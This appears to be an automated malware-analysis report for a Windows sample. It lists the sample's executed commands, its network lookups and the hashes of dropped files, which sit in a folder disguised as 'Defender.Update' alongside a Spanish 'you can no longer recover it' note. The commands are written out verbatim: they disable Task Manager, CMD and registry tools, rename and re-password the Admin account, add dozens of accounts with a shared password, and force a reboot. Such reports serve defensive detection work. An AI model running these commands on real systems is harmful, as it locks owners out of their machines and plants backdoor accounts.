reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v HideFastUserSwitching /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DontDisplayUserName /t REG_DWORD /d 3 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f

C:\Windows\System32\Wbem\WMIC.exe

wmic useraccount where name='Admin' rename "YOU ARE THE NEXT"

C:\Windows\system32\net.exe

net user "YOU ARE THE NEXT" "im dead"

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user "YOU ARE THE NEXT" "im dead"

C:\Windows\system32\net.exe

net user T3yZrQ Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user T3yZrQ Maxcheto /add

C:\Windows\system32\net.exe

net user 8rJpX1 Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 8rJpX1 Maxcheto /add

C:\Windows\system32\net.exe

net user 9MaL2Z Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 9MaL2Z Maxcheto /add

C:\Windows\system32\net.exe

net user K4$dF27 Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user K4$dF27 Maxcheto /add

C:\Windows\system32\net.exe

net user xC78RT Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user xC78RT Maxcheto /add

C:\Windows\system32\net.exe

net user 3nL9$p2x Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 3nL9$p2x Maxcheto /add

C:\Windows\system32\net.exe

net user X7hbQ5Z Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user X7hbQ5Z Maxcheto /add

C:\Windows\system32\net.exe

net user R2xD1B Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user R2xD1B Maxcheto /add

C:\Windows\system32\net.exe

net user m14T8z Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user m14T8z Maxcheto /add

C:\Windows\system32\net.exe

net user L27w8G Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user L27w8G Maxcheto /add

C:\Windows\system32\net.exe

net user P9dR2Y Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user P9dR2Y Maxcheto /add

C:\Windows\system32\net.exe

net user 5QL71t Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 5QL71t Maxcheto /add

C:\Windows\system32\net.exe

net user r8B6V3F Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user r8B6V3F Maxcheto /add

C:\Windows\system32\net.exe

net user 7CXz1b Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 7CXz1b Maxcheto /add

C:\Windows\system32\net.exe

net user n38vJQ Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user n38vJQ Maxcheto /add

C:\Windows\system32\net.exe

net user x6G7P1L Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user x6G7P1L Maxcheto /add

C:\Windows\system32\net.exe

net user M239Wk Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user M239Wk Maxcheto /add

C:\Windows\system32\net.exe

net user 7F2hY4Z Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 7F2hY4Z Maxcheto /add

C:\Windows\system32\net.exe

net user 8QrB1L7 Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 8QrB1L7 Maxcheto /add

C:\Windows\system32\net.exe

net user t93V6D Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user t93V6D Maxcheto /add

C:\Windows\system32\net.exe

net user 5tG2Q8J Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user 5tG2Q8J Maxcheto /add

C:\Windows\system32\net.exe

net user x9K1P7L Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user x9K1P7L Maxcheto /add

C:\Windows\system32\net.exe

net user z7R4M3 Maxcheto /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user z7R4M3 Maxcheto /add

C:\Windows\system32\shutdown.exe

shutdown /r /f /t 0

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x4 /state0:0xa3956855 /state1:0x41c64e6d

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp

Files

C:\Windows\System32\Microsoft\Protect\Defender.Update\main.vbs

MD5 7c652236d1e09a76cfc27cb2611b80ad
SHA1 f9c359054835b06308165e110cdc5229d4fda8fb
SHA256 4026d4567c422a1281580654d5592d5ce00fce125d8565b7c00ac5f7eb712e4c
SHA512 6a283c0428b91fbc39efbea2c3a793d89de1ae46451acf2c376c8b9b64c946ffa9ec9d83cc154d1647949e2cad79b2de2e3d655286d94ab52089734a92f943fe

C:\Windows\System32\Microsoft\Protect\Defender.Update\main.cmd

MD5 7835d8ae389b8b78ea4d06c024d63849
SHA1 5a0196e67a8af7185b372aacf5ad817a26546ad1
SHA256 029a47eb246a5d4aa21b9a4ccaffc5103c5d93cd8955869d62d04e4f75612fd1
SHA512 3b5c9ef7a6ec79983475b78e52b0e2c5d059cbcfd6b40832ddad067ed3fbf648507836664d489553372da6bfecc2c697b51b3ec57e5aa4d2939707bfc90c9372

C:\Windows\System32\Microsoft\Protect\Defender.Update\user-32.png

MD5 4947724257526b4226e21ae7541822cd
SHA1 af4db735de48a5069e70758bdfdf41a8214aa346
SHA256 19fbde1e1c5489c3cabc0dcd408f43b789a2e2f89af03a1d4466e55ab1a1faba
SHA512 52986bdd6a21ae6c5c375a8142bb7cd758d537923e8427f0d6fce0763299306a720163246bd2808a1566c3422caefaa28d3d046f2a466baba3305c51d7ff8902

C:\Windows\System32\Microsoft\Protect\Defender.Update\user-40.png

MD5 2f368b76ab153329fb42db70493474b1
SHA1 4c4752399ee2678f6cf4d67affca9dcba59d0023
SHA256 ae8f3768cf4e3af37ad6efedff11f7f2aa6af91239c175a04c1c366b56b8c35f
SHA512 adccaad355c71376490d5d21d788b3921db7c08291c8ef4066ced9c8cf99d188307da49f53fa987ecddd88f9c2b6c191969ad2d34b016aadefac5afd88dc4c6a

C:\Windows\System32\Microsoft\Protect\Defender.Update\user-48.png

MD5 9ef9685c5a578bfdceccaedb0d5fa519
SHA1 713f8621414772eee6602f9fa9ee0a3528d62057
SHA256 6c118f5c5e4cf755ec5da06033a29faf53911c522f5aa3de2da2ae8944a87746
SHA512 2238ee61a60358f5dfb003fbc69099cea7f62ad88f57c4629f022792d6257fef6928df5e613df152258475d1d49aaad6ae24119d1a67a86e0cdf96aafabbddfb

C:\Windows\System32\Microsoft\Protect\Defender.Update\user-192.png

MD5 f346c440007285aff13e1e0512608862
SHA1 4b4a44bc30d37c66dea948bd406effc2bcc63775
SHA256 2f2c6c5d8f57b0816cbf1d8db47d0735951f1d1cbf8d562046677391bac23901
SHA512 34fd2d6734f3825496d3f8d36057832c39052a0cda05efdc44e2d94f45f8b710da790fda4882bfa1eeb3a9971c5207a6a5a567ec4949cd47fd8efbe95f35f032

C:\Windows\System32\Microsoft\Protect\Defender.Update\user.png

MD5 1db691b8c60c5f82f3dae2df999c1c7c
SHA1 c252d4a6e065ab5b122f0ae43f6abdbaad49d80e
SHA256 f2669088bebce7d2624993500bc63677dc1a96a1d733c1df88feff17954b201d
SHA512 3629aaf9e5c40f86c8bdcbfd462a80af19cb883ab2e4b3e3b62f661bedd7c40f4254ae9f274cbd96f3cac2d156cc3a1e5bb3b649bb0df99ecbd93a8ca65330c7

C:\Windows\System32\Microsoft\Protect\Defender.Update\guest.png

MD5 908587d867cd053293e2106d70cf42f3
SHA1 83ffc3fc7f61d972b41347ff783a29b41bf13087
SHA256 f622a9159e4b2e792ac772bfc2cfc0ea6c890bad7f7273c916418ce3d425e444
SHA512 541b65da137ed37139146ce27aaaee58dac29892c43b39eb0a0a793ed2d868ca8e24bfe836b133e8941ac72ba8a3e1f6a80e04d30b6dea87846cf86129fda5e8

C:\Windows\System32\Microsoft\Protect\Defender.Update\user.bmp

MD5 40e2162dfc51fded60ea7b1de3acf588
SHA1 3c0b932a845027db10e67c47c0c9cd45fa80ecbb
SHA256 d0d3a8fd4d52042486c2ff093ca64e99fa54b256a7c551f20a6c3f53f569fbf7
SHA512 453aea922c4801dc7f7defae4be326158abef053a61518f3a7e1d32118130f8f1dc18945c783e20c5b52e4d698613c7ff715ec17e01b5166acc5f380a156047a

\??\PIPE\lsarpc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Windows\System32\Microsoft\Protect\Defender.Update\YA.NO.LO.PUEDES.RECUPERAR.txt

MD5 e3a317c88b65b975be8e1c21e149f16d
SHA1 6e7a24a1146ba2800bf0c56ef5b17ea32b01f019
SHA256 b21c998e4c7258fd24a27f0be4d0ddbdcf95a9f2d7b4f041727e241578a410c0
SHA512 1d1228f0f297867b6b134ff8fe5cd493929103098a07beb0edbd63957423dc8536092482d7a061072398bf26e8a5e6a5b3e6fc67439d934671433f4b01208044